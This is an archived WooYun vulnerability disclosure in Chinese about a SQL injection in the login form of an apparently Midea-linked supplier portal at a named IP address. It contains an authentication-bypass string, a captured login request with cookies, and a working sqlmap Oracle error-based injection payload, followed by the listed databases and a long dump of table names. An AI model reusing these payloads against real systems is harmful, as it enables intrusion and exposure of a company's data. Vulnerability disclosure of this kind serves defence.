乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-27: 细节已通知厂商并且等待厂商处理中 2015-06-27: 厂商已经确认,细节仅向厂商公开 2015-07-07: 细节向核心白帽子及相关领域专家公开 2015-07-17: 细节向普通白帽子公开 2015-07-27: 细节向实习白帽子公开 2015-08-11: 细节向公众公开
美的???meide??
http://120.132.154.11:8080/web/rdlogin.jsp
0x00
admin'or'1'='1登陆
不过没什么用
0x01
登录入口抓包POST /web/SubmitLogin.do HTTP/1.1Host: 120.132.154.11:8080Proxy-Connection: keep-aliveContent-Length: 125Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://120.132.154.11:8080User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://120.132.154.11:8080/web/SubmitLogin.doAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: CPCUserName=test; ch1=true; ch2=false; lastloginuser=test; entcode=mdrd; JSESSIONID=6By6VT5B2qn4HhyPT4PlmTvqXLGhQ5xJkwJv324RTww2YYBHXqtd!-549272955value%28entcode1%29=mdrd&value%28entcode%29=mdrd&value%28userName%29=test&value%28password%29=test&Submit=%E7%99%BB+%E5%BD%95
current schema (equivalent to database on Oracle): 'MDRD'Place: POSTParameter: value(userName) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: value(entcode1)=mdrd&value(entcode)=mdrd&value(userName)=test' AND8955=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(121)||CHR(109)||CHR(116)||CHR(58)||(SELECT (CASE WHEN (8955=8955) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(98)||CHR(107)||CHR(98)||CHR(58)||CHR(62))) FROM DUAL) AND 'uWtW'='uWtW&value(password)=test&Submit=? ?
available databases [4]:[*] ETWMAIL[*] MDRD[*] SYS[*] SYSTEM
sqmlap已经超出了,就把现实的复制下吧
| CPCWFATTACH || CPCWFOBJ || CPCWFOBJTEMP || CPCWFPROC || CPCWFPROCH || CPCWFPROCNOTICE || CPCWFPROCSIGN || CPCWFPROCSIGNTEMP || CPCWFPROCTASK || CPCWFPROCTEMP || CPCWFPROCTEMPNOTICE || CPCWFPROCTEMP_20100413 || CPCWFPROCTYPE || CPCWFPUBLISH || CPCWFPUBTEMP || CPCWFREF || CPCWFSHEET || CPCWFTEMP || CPCWFTEMPCROSS || CPCWFTEMPREF || CPCWFTEMPS || CPCWFUSERRANGE || CPCWORKLOG || CPCWORKPLAN || CPCWORKSPACE || CPCWORKTIME || CPCWORKTIMECFG || CPCWSENT || CPCWSOBJ || CPCWSREF || CPCWSREF20120317 || CPC_COLUMN || CPC_VENDOR || DELIVER_ADDRESS || DELIVER_ADDRESS_CONSTRAINT || DELIVER_ADDRESS_INTERFACE || DELIVER_MESSAGE || DELIVER_MESSAGE20130122 || DELIVER_MESSAGE_FORMERGE || DELIVER_MESSAGE_H || DELIVER_MESSAGE_HISTORY || DELIVER_MESSAGE_INT || DELIVER_MESSAGE_INT20121029 || DELIVER_MESSAGE_INTERFACE || DELIVER_MESSAGE_INT_LOG || DELIVER_MESSAGE_LOG || DELIVER_MESSAGE_SURE_INTERFACE || DELIVER_MESSAGE_SURE_INT_LOG || DELIVER_MESSAGE_TEST || DELIVER_MI_20140422 || DELIVER_OUTBILL_HEAD_INTERFACE || DELIVER_OUTBILL_HEAD_INT_LOG || DELIVER_OUTBILL_LINE_INTERFACE || DELIVER_OUTBILL_LINE_INT_LOG || EBS_CPC_USER_RELATION || FXH20110919 || INNER_ITEM_ID20120314 || INTERFACECHECK || INTERFACESTATE || INTERFACEVENDOR || INTERFACE_SYNCHRONIZED || INTVARCHAR || INVOICENO_SURE_INTERFACE || INVOICENO_SYN_INTERFACE || INVOICE_BILL_HEAD_INTERFACE || INVOICE_BILL_LINE_INTERFACE || INVOICE_BILL_RECEIVE_INTERFACE || INVOICE_CREATE_HEAD_INTERFACE || INVOICE_CREATE_LINE_INTERFACE || INV_IN_BILL_HEAD || INV_IN_BILL_HEAD_H || INV_IN_BILL_LINE || INV_IN_BILL_LINE_H || INV_MONTHSUM || INV_OUT_BILL_HEAD || INV_OUT_BILL_HEAD0929 || INV_OUT_BILL_HEAD120330 || INV_OUT_BILL_HEAD20110927 || INV_OUT_BILL_HEAD20120314 || INV_OUT_BILL_HEAD20120319 || INV_OUT_BILL_HEAD20120406 || INV_OUT_BILL_HEAD_FORMERGE || INV_OUT_BILL_HEAD_H || INV_OUT_BILL_HEAD_ID20120319 || INV_OUT_BILL_HEAD_LOG || INV_OUT_BILL_LINE || INV_OUT_BILL_LINE120330 || INV_OUT_BILL_LINE20120319 || INV_OUT_BILL_LINE_H || INV_OUT_BILL_LINE_LOG || INV_VENDOR_INV || INV_VENDOR_INV20110926 || INV_VENDOR_INV20110927 || INV_VENDOR_INV20120221DEL || INV_VENDOR_INV_H || INV_VENDOR_INV_INTERFACE || ITEM || ITEM20120314 || ITEM_20101018 || ITEM_20111130 || ITEM_20120315 || ITEM_BIG_KIND || ITEM_H || ITEM_INTERFACE || ITEM_INTERFACE20120314 || ITEM_INTERFACE20120314_1 || ITEM_INTERFACE_20101018 || ITEM_INVENTORY || ITEM_KIND_USER_RELATION || ITEM_ORG || ITEM_SUPPLY_RATE || ITEM_SUPPLY_RATE20120314 || ITEM_SUPPLY_RATE_INTERFACE || LOGINLOG || LOGINLOG_ALL_BAK || LOGINLOG_ALL_BAK1 || MESSAGE_CLOSE_INTERFACE || MESSAGE_CLOSE_INT_LOG || MODIFY_BUSINESS_HISTORY || NOTICE_READ_SYNCHRON_INTERFACE || NOTICE_SYNCHRON_ATTACH_INT || NOTICE_SYNCHRON_INTERFACE || OCKRESULT || OCKRESULT_INTERFACE || ORDER_CHANGE_INTERFACE || ORDER_CHANGE_INT_LOG || ORDER_STATUS_SURE_INTERFACE || ORDER_STATUS_SURE_INT_LOG || ORDER_VENDOR_INFO || ORDER_VENDOR_INFO_INTERFACE || ORG_AREA || OUTBILL_DEAL_HEAD_INTERFACE || OUTBILL_DEAL_HEAD_INT_LOG || OUTBILL_DEAL_LINE_INTERFACE || OUTBILL_DEAL_LINE_INT_LOG || PRIVATE_TRADE || PURCHASE_INBILL_HEAD_INTERFACE || PURCHASE_INBILL_LINE_INTERFACE || PURCHASE_ORDER_HEAD || PURCHASE_ORDER_HEAD_H || PURCHASE_ORDER_HEAD_INTERFACE || PURCHASE_ORDER_HEAD_INT_LOG || PURCHASE_ORDER_LINE || PURCHASE_ORDER_LINE_H || PURCHASE_ORDER_LINE_INTERFACE || PURCHASE_ORDER_LINE_INT_LOG || PURCHASE_ORDER_PLAN || QUESTION_TYPE || REQUEST_LEAD_BILL20111219 || REQUEST_LEAD_BILL2013311 || REQUEST_LEAD_BILL_HEAD || REQUEST_LEAD_BILL_HEAD20110927 || REQUEST_LEAD_BILL_HEAD20110928 || REQUEST_LEAD_BILL_HEAD20111006 || REQUEST_LEAD_BILL_HEAD20111007 || REQUEST_LEAD_BILL_HEAD20111010 || REQUEST_LEAD_BILL_HEAD20111011 || REQUEST_LEAD_BILL_HEAD20111219 || REQUEST_LEAD_BILL_HEAD2012 || REQUEST_LEAD_BILL_HEAD20120227 || REQUEST_LEAD_BILL_HEAD20120314 || REQUEST_LEAD_BILL_HEAD20120427 || REQUEST_LEAD_BILL_HEAD_110811 || REQUEST_LEAD_BILL_HEAD_H || REQUEST_LEAD_BILL_HEAD_LOG || REQUEST_LEAD_BILL_LINE || REQUEST_LEAD_BILL_LINE20110928 || REQUEST_LEAD_BILL_LINE20111006 || REQUEST_LEAD_BILL_LINE20111007 || REQUEST_LEAD_BILL_LINE20111010 || REQUEST_LEAD_BILL_LINE20120227 || REQUEST_LEAD_BILL_LINE20120427 || REQUEST_LEAD_BILL_LINE2021 || REQUEST_LEAD_BILL_LINE_H || REQUEST_LEAD_BILL_LINE_LOG || REQUEST_LEAD_HEAD_FORMERGE || REQUEST_LEAD_HEAD_INTERFACE || REQUEST_LEAD_LINE_INTERFACE || RFI_ANSWER_CHOOSE_BANK || RFI_ANSWER_CHOOSE_FILED || RFI_ANSWER_JUDGE_MARKING || RPTDS || RPTSP || RPTTABLE || SALE_BILL_PRICE_DIFF || SALE_OUTBILL_HEAD_INTERFACE || SALE_OUTBILL_LINE_INTERFACE || SCM_INIT_VENDOR || SCM_INIT_VENDOR20110929 || SCP_REQUEST_LEAD_HEAD_INT || SCP_REQUEST_LEAD_HEAD_INT0625 || SCP_REQUEST_LEAD_LINE_INT || SCP_STATEMENT_CUSTOMER_INT || SCP_STATEMENT_CUSTOMER_INT0919 || SCP_STATEMENT_CUST_INT120314 || SCP_STATEMENT_HEAD_INT0919 || SCP_STATEMENT_HEAD_INTER120314 || SCP_STATEMENT_HEAD_INTERFACE || SCP_STATEMENT_VENDOR_INT || SCP_STATEMENT_VENDOR_INT0919 || SCP_STATEMENT_VENDOR_INT120314 || SCP_VEND_FORFEIT_INTERFACE || SHIPMENTAREA20120316 || SHIPMENT_HEADER20120621 || SHIPMENT_HEADER2013311 || SHIPMENT_LINE20120621 || SP_LOG || STCPUPLOADFILELIST || STCP_NEWDOCRECEIVE_LIB || STCP_PS_BOM_INT || STCP_PS_DOCSEND_INT || STCP_PS_ECNDRAWLINE_INT || STCP_PS_ECN_INT || STCP_PS_ITEM_INT || STCP_PS_SEND_SAMP_MESSAGE_INT || STCP_PS_SEND_SAMP_MES_DR_INT || STCP_SEND_SAMP_DRAWREL || STCP_SEND_SAMP_HEAD || STCP_SEND_SAMP_LINE || STCP_SEND_SAMP_MESSAGE || STCP_SEND_SAMP_MESSAGE_DRAWREL || STCP_SP_DOCSEND_FEEDBACK_INT || STCP_SP_SEND_SAMP_DRAWREL_INT || STCP_SP_SEND_SAMP_HEAD_INT || STCP_SP_SEND_SAMP_LINE_INT || STCP_SP_SEND_SAMP_MESSAGE_INT || STCP_SP_SEND_SAMP_MES_DR_INT || SUB_INV_SET || SUB_INV_SET_INTERFACE || SYS_TEMP_FBT || TEMP20140902ZRL || TEMP20150323ZRL1 || TENANT_CUSTOMER || TENANT_CUSTOMER_ROLE || TMP_AP_STATEMENT_C_LINE || TMP_AP_STATEMENT_HEAD || TMP_AP_STATEMENT_V_LINE || TMP_DELIVER_MESSAGE_04 || TMP_INIT_VENDOR || TMP_INVBILL_1111 || TMP_INV_OUT_BILL_HEAD || TMP_INV_OUT_BILL_HEAD1205 || TMP_INV_OUT_BILL_LINE || TMP_INV_OUT_BILL_LINE1205 || TMP_INV_VENDOR_INV || TMP_MESSAGE || TMP_QITONG || TMP_REQUEST_LEAD_BILL20110929 || TMP_REQUEST_LEAD_BILL_HEAD || TMP_REQUEST_LEAD_BILL_HEAD1205 || TMP_REQUEST_LEAD_BILL_LINE || TMP_REQUEST_LEAD_BILL_LINE1205 || TMP_SERPC || TMP_SHIPMENT_HEAD20110929 || TMP_SHIPMENT_HEADER || TMP_SHIPMENT_LINE || TMP_TABLE || TMP_VENDOR1008 || TMP_VENDOR100801 || TMP_ZZH_3_2 || TRADE_INFO || TREETEST || UOM || USER_ACCESS_20110928 || USER_ACCESS_RELATION || USER_ACCESS_RELATION0928 || USER_ACCESS_RELATION20110928 || USER_AUTHENTICATE || USER_INFO || USER_INFO20110927 || USER_INFO20110928 || USER_INFO_XL || USPTOTEST1 || VARFACECHECK || VAT_REGI20110927 || VENDORLOC || VENDOR_INTERFACE || VENDOR_INTERFACE20110927 || VENDOR_LIMIT_AMOUNT20120317 || VENDOR_LIMIT_AMOUNT20120321 || VENDOR_SITE || VENDOR_SITE0920 || VENDOR_SITE0928 || VENDOR_SITEDEL20110921 || VENDOR_SITE_INTERFACE || WEBSERVICEMSG || WEBSERVICEMSG20120316 || WEBSERVICEMSG_LOG || WEBSERVICE_INFO || WEB_DATA_FIELD_MAPPING || WEB_DATA_TRANSFER_CONFIG || WIP_BK_CLASS |+--------------------------------+
危害等级:低
漏洞Rank:5
确认时间:2015-06-27 23:31
感谢@DloveJ的提醒,目前我们正在确认漏洞信息。
暂无